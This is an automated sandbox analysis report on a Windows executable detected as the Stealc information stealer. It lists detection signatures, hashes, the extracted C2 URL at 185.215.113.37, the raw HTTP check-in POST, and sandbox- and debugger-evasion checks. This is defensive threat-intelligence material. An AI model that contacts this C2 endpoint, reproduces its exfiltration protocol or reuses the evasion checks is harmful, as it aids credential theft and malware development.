Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520589
MD5:ad0c6bd7353136531af5325034613533
SHA1:ee44d2b2e6ad3e32da9c074b5b880e4947c4970c
SHA256:5947b0b670dbb94778390c83aeb091874f10cb952b2dc3c459ac0e23f380a523
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD0C6BD7353136531AF5325034613533)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6172JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6172JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ec0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T16:17:12.173171+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.ec0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00ECC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00EC9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00EC7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00EC9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00ED8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00ED38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ED4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ECE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00ED4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ECED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00ED3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF68A FindFirstFileA,0_2_00ECF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 35 37 35 30 39 34 33 44 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="hwid"CF5750943D0B612331747------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="build"save------JKECFCFBGDHIECAAFIID--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00EC4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 35 37 35 30 39 34 33 44 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="hwid"CF5750943D0B612331747------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="build"save------JKECFCFBGDHIECAAFIID--
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/6t
                Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
                Source: file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37p

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A0_2_0128B17A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129E95B0_2_0129E95B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128C1B70_2_0128C1B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129A03D0_2_0129A03D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129B32B0_2_0129B32B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116638E0_2_0116638E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129120A0_2_0129120A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BD26B0_2_011BD26B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126EAFD0_2_0126EAFD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01297D170_2_01297D17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128DD910_2_0128DD91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011FCDFA0_2_011FCDFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A1FC20_2_012A1FC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012946EB0_2_012946EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F6F90_2_0128F6F9
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EC45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00ED8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00ED3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\256HLV51.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1875456 > 1048576
                Source: file.exeStatic PE information: Raw size of llbyxbem is bigger than: 0x100000 < 0x1a3a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;llbyxbem:EW;vndwcpmt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;llbyxbem:EW;vndwcpmt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cf94b should be: 0x1d61a0
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: llbyxbem
                Source: file.exeStatic PE information: section name: vndwcpmt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B0922 push 0E3C32F7h; mov dword ptr [esp], ebx0_2_012B0815
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B813F push eax; mov dword ptr [esp], 231F4C4Dh0_2_012B81B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CA11E push edx; mov dword ptr [esp], 5F6745E3h0_2_012CA141
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CA11E push ecx; mov dword ptr [esp], 7FDE016Ah0_2_012CA175
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CA11E push ebx; mov dword ptr [esp], ebp0_2_012CA1AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CA11E push 482FE650h; mov dword ptr [esp], ebp0_2_012CA212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0134A90D push 70183CF2h; mov dword ptr [esp], esi0_2_0134A932
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0134A90D push 0ED78B4Bh; mov dword ptr [esp], ebp0_2_0134A95C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push esi; mov dword ptr [esp], ebx0_2_0128B1AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ecx; mov dword ptr [esp], 7DDCA5EBh0_2_0128B1C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ebp; mov dword ptr [esp], edx0_2_0128B1EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push eax; mov dword ptr [esp], 5B5BC2F1h0_2_0128B2D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 1A0BF2A8h; mov dword ptr [esp], ebp0_2_0128B311
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push edx; mov dword ptr [esp], ebp0_2_0128B31B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 3D354340h; mov dword ptr [esp], eax0_2_0128B482
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push esi; mov dword ptr [esp], 18819C58h0_2_0128B4D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ebx; mov dword ptr [esp], esi0_2_0128B5AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 19FF4F9Ah; mov dword ptr [esp], edx0_2_0128B637
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ecx; mov dword ptr [esp], 7EBF5DF6h0_2_0128B63C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 53200ED0h; mov dword ptr [esp], ebx0_2_0128B684
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push edi; mov dword ptr [esp], 3FFE592Fh0_2_0128B69B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 59311D72h; mov dword ptr [esp], ebp0_2_0128B6C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ebp; mov dword ptr [esp], 3CED0877h0_2_0128B6CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push edi; mov dword ptr [esp], edx0_2_0128B75D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push eax; mov dword ptr [esp], esi0_2_0128B7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ebp; mov dword ptr [esp], edx0_2_0128B883
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push esi; mov dword ptr [esp], eax0_2_0128B8EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push 2E35D8B9h; mov dword ptr [esp], ecx0_2_0128BA66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128B17A push ebx; mov dword ptr [esp], 7FD7813Bh0_2_0128BA6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132616D push ebx; mov dword ptr [esp], edi0_2_01326186
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CC14A push 2B5D8858h; mov dword ptr [esp], edi0_2_012CC186
                Source: file.exeStatic PE information: section name: llbyxbem entropy: 7.9547357115051796

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13665
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121B24 second address: 1121B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F15490E9B96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121B46 second address: 1121B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A724E second address: 12A725A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A725A second address: 12A7293 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1548D0B2FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1548D0B301h 0x00000012 jmp 00007F1548D0B305h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6321 second address: 12A632C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6488 second address: 12A648D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6762 second address: 12A676A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A676A second address: 12A676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
